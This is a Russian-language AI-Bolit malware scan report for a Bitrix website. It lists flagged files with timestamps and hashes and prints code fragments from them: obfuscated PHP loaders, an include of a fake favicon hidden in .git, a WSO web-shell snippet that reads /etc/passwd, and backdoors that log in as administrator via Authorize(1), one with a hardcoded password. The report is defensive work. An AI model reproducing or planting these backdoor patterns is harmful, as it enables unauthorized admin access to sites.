Отчет сканера AI-Bolit v20190226-2242: /home/elmtree/elmtree.ru/docs/ (1/1)
Сканер бесплатный только для личного некоммерческого использования. Информация по коммерческой лицензии (пункт №11). Авторское свидетельство о гос. регистрации в РосПатенте №2012619254 от 12 октября 2012 г.
Затрачено времени: 32 m . Сканирование начато 22-08-2019 в 19:48:41, сканирование завершено 22-08-2019 в 20:21:00
Всего проверено 26103 директорий и 32704 файлов. Использовано памяти при сканировании: 23.37 Mb.
Сводный отчет
Вредоносных скриптов18
Пропущенных больших файлов8
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер минимизирует число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.

Для диагностического сканирования без ложных срабатываний мы разработали специальную версию сканера для хостинг-компаний.

Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Возможно, ваш сайт был взломан. Рекомендуем срочно проконсультироваться со специалистами по данному отчету.


Рекомендуем также проверить сайт бесплатным онлайн-сканером ReScan.Pro.


Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Наши продукты:
Критические замечания
Эти файлы могут быть вредоносными или хакерскими скриптами (18)
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
[x] 1…x'. 'tG0cPjnxPjnxPjBN1QkHPjl21XlkuyZkTyZZMi0cPjnxPjnxPjBNs3N0cj2brGKxPjnxtG0crGKxPjnx'. '1m9tf3hAvQNdXQhH1uGKc6W9ja0=';  $hyupocln=Array('1'=>'Y','0'=>'0','3'=>'G','2'=>'k','5'=>'z','4'=>'b','7'=>'F','6'=>'T','9'=>'N','8'=>'i','
07/07/2017 20:43:07
12/06/2017 05:25:15
28.87 Kb
f6ae56bcb959074a12af4bfe8cdba0ed960d56b6
x
1497234315
id_6f554b48
[x] BIG FILE. SKIPPED.
07/07/2017 20:43:07
27/07/2015 12:55:51
4.68 Mb
00f702fa6de61d0856bbf95865779eb1af07e4d5
x
1437990951
id_big_1
[x] BIG FILE. SKIPPED.
14/09/2018 16:00:22
24/11/2016 11:29:44
927.43 Kb
eab052ea08672f1b2ed398c7d612ca57d0bf4813
x
1479976184
id_big_1
[x] BIG FILE. SKIPPED.
14/09/2018 16:00:30
24/11/2016 11:29:44
1.04 Mb
0085476f57bb6fc55a20702a8b95efaad5593ba1
x
1479976184
id_big_1
[x] 1<?php  /*943ba*/ include "/home/elmtree/elmtree.ru/docs/.git/objects/42/favicon_e1
26/04/2018 17:37:09
26/04/2018 17:37:09
242 b
7ebd98555f9a577167ed33f83e2a9e098fa328a5
x
1524753429
id_5957a1fa
[x] 1…ct($str);pg_close($res);return$res;}}$success=0;$attempts=0;$server=explode(":",$_POST['server']);if($_POST['type']==1){ $temp=file('/etc/passwd');if(is_array($temp)) foreach($temp as$line){$line=explode(":",$line);++$attempts;if(wsoBruteFo
26/04/2018 17:37:09
26/04/2018 17:37:09
73.78 Kb
c0d0e66729cb06146584f2fe581e8e872ddcb4a4
x
1524753429
id_0bfd29c0
[x] 1<?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/header.php");global$USER; $USER->Authorize(1);LocalRedirect("/bitrix/admin/");?
31/08/2017 17:51:44
31/08/2017 17:51:44
168 b
106f9b5facdb9049d7309797a58e0524656f0404
x
1504191104
id_a89027da
[x] BIG FILE. SKIPPED.
22/07/2017 23:37:29
22/07/2017 23:37:29
858.38 Kb
f08ca8b651c1ad427097a6f521bf82ef332c02e1
x
1500755849
id_big_1
[x] BIG FILE. SKIPPED.
22/07/2017 23:37:29
22/07/2017 23:37:29
858.38 Kb
f08ca8b651c1ad427097a6f521bf82ef332c02e1
x
1500755849
id_big_1
[x] 1<? $GLOBALS['_____329592688']=array('IncludeModuleLangFile','GetModuleEvents','ExecuteModuleEventEx');$GLOBALS['____938947
27/06/2018 13:52:49
27/06/2018 13:52:49
250.31 Kb
3487b03e684837a298fe0b9760cc03321d061b10
x
1530096769
id_93e67a24
[x] 1…ERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/ajax_tools.php"); /*ZDUyZmZZTAyMjBmM2NkOTc0YmEzNGE2OTBiZjU0NTE4NzQwZDE=*/ $GLOBALS['_____914222941']=array(base64_decode('R2V0TW9kdWxlRXZlbnRz'),base64_decode('RXhlY3V0ZU1vZHVsZ
24/05/2018 14:52:15
24/05/2018 14:52:15
25.76 Kb
1938562764dcca2c962e9fb112f7fdcdcf14d48c
x
1527162735
id_93e67a24
[x] 1…="width : 100px;float: left;" id="img_wrapper"><img src='/bitrix/images/sale/magaz.png'></div><div class='block_step'><? $step=0;$select='';$newTables=array('b_sale_order_discount','b_sale_order_payment','b_sale_order_coupons','b_sale_order
23/07/2017 09:49:06
23/07/2017 09:49:06
190.00 Kb
cf6beb77e669f7754a30f6776e0fa09835eba7df
x
1500792546
id_c825ce9d
[x] 1…hp");if(CModule::IncludeModule("seo")&&($_REQUEST['pass']=='L0qEK4qaF3kvZYajON')&&($_REQUEST['action']=="sitemap_run")){ $USER->Authorize(1);if(empty($_SESSION["CRON_SESSION_ID"])){$str=bitrix_sessid_post();preg_match('/value\=\"([a-z0-9]+)
07/07/2017 20:47:49
28/09/2015 18:07:06
653 b
8de0ae80db320fba13ec7697819d3c0c3dc9e7db
x
1443452826
id_a89027da
[x] 1…ct($str);pg_close($res);return$res;}}$success=0;$attempts=0;$server=explode(":",$_POST['server']);if($_POST['type']==1){ $temp=file('/etc/passwd');if(is_array($temp)) foreach($temp as$line){$line=explode(":",$line);++$attempts;if(wsoBruteFo
31/08/2017 17:45:59
31/08/2017 17:45:59
73.78 Kb
c0d0e66729cb06146584f2fe581e8e872ddcb4a4
x
1504190759
id_0bfd29c0
[x] 1…8UCIGiNV9a1SVxOisWa4qofjtZGb8xni5ZNqVhnI5ZO'. 'j3ksAo6GMmNOjOWNqVxOis6pA9a1SqWNLqZkmSHuLVxOisDt468146a1d'. 'jgzj46NV9';  $tblnbv=Array('1'=>'Q','0'=>'6','3'=>'n','2'=>'X','5'=>'u','4'=>'0','7'=>'t','6'=>'K','9'=>'7','8'=>'f','A'
07/07/2017 20:47:51
28/02/2017 23:36:23
151.04 Kb
4dfd9e629783bea0d7634bb8bbdaeae87338acca
x
1488314183
id_6f554b48
[x] 1…dkUJdsFAykUJdkUJdkUr3tmclkUv6tKvcuGYcSGYYXzAykUJdkUJdkUr3983AyU6MqF2dkUJdsFAyqF2'. 'dkUJdtQhsi8P5Lm3RKmPltuF2yaBhU0A=';  $dfxubq=Array('1'=>'S','0'=>'n','3'=>'l','2'=>'o','5'=>'1','4'=>'M','7'=>'9','6'=>'k','9'=>'e','8'=>'G','A'
07/07/2017 20:48:21
20/03/2017 14:19:42
28.84 Kb
a76af0116928691f12f458cb78faaf1403ed946d
x
1490008782
id_6f554b48
[x] BIG FILE. SKIPPED.
01/08/2019 14:49:19
01/08/2019 14:49:19
1.38 Mb
a86d74060e47f873cded6e9910f65786808016b1
x
1564660159
id_big_1
[x] BIG FILE. SKIPPED.
01/08/2019 14:49:54
01/08/2019 14:49:54
1.38 Mb
a86d74060e47f873cded6e9910f65786808016b1
x
1564660194
id_big_1
Предупреждения
Дорвеи, реклама, спам-ссылки, редиректы
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
1…cting) set of directives are used:..code-block:: apache SetOutputFilter PHP SetInputFilter PHP and..code-block:: apache AddType application/x-httpd-php.php In the case we saw,one set of directives was in ``/etc/httpd/conf/httpd.conf``,whil
14/09/2018 16:00:19
24/11/2016 11:29:44
79.71 Kb
8b1bab996341a77994dcd0a4663248edd46e36fc
x
1479976184
id_z5980282
1…log_admin_before.php");if(!$USER->CanDoOperation('edit_php')){$APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));}else{ phpinfo();}?
07/07/2017 20:47:10
26/09/2007 10:34:14
204 b
3de4d48a050d233c344ad5b4be60ef4f15d4498f
x
1190788454
id_z6848931
Большие файлы (больше чем 650.00 Kb). Пропущено
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
07/07/2017 20:43:07
27/07/2015 12:55:51
4.68 Mb
00f702fa6de61d0856bbf95865779eb1af07e4d5
x
1437990951
id_z1079196
14/09/2018 16:00:22
24/11/2016 11:29:44
927.43 Kb
eab052ea08672f1b2ed398c7d612ca57d0bf4813
x
1479976184
id_z8396562
14/09/2018 16:00:30
24/11/2016 11:29:44
1.04 Mb
0085476f57bb6fc55a20702a8b95efaad5593ba1
x
1479976184
id_z6033227
22/07/2017 23:37:29
22/07/2017 23:37:29
858.38 Kb
f08ca8b651c1ad427097a6f521bf82ef332c02e1
x
1500755849
id_z3391653
22/07/2017 23:37:29
22/07/2017 23:37:29
858.38 Kb
f08ca8b651c1ad427097a6f521bf82ef332c02e1
x
1500755849
id_z1025173
01/08/2019 14:49:19
01/08/2019 14:49:19
1.38 Mb
a86d74060e47f873cded6e9910f65786808016b1
x
1564660159
id_z6364618
01/08/2019 14:49:54
01/08/2019 14:49:54
1.38 Mb
a86d74060e47f873cded6e9910f65786808016b1
x
1564660194
id_z1342730
23/07/2017 10:56:41
23/07/2017 10:56:41
1,001.58 Kb
d29d6151d67ebe2dcc1cd611cfd9639cce9dc1e5
x
1500796601
id_z5891622
Подозрение на дорвей
ПутьИзменение свойствИзменение содержимогоРазмерCRC32
-
-
-
x
id_z5587768
-
-
-
x
id_z8498620
Версии найденных CMS
Bitrix v17.0.10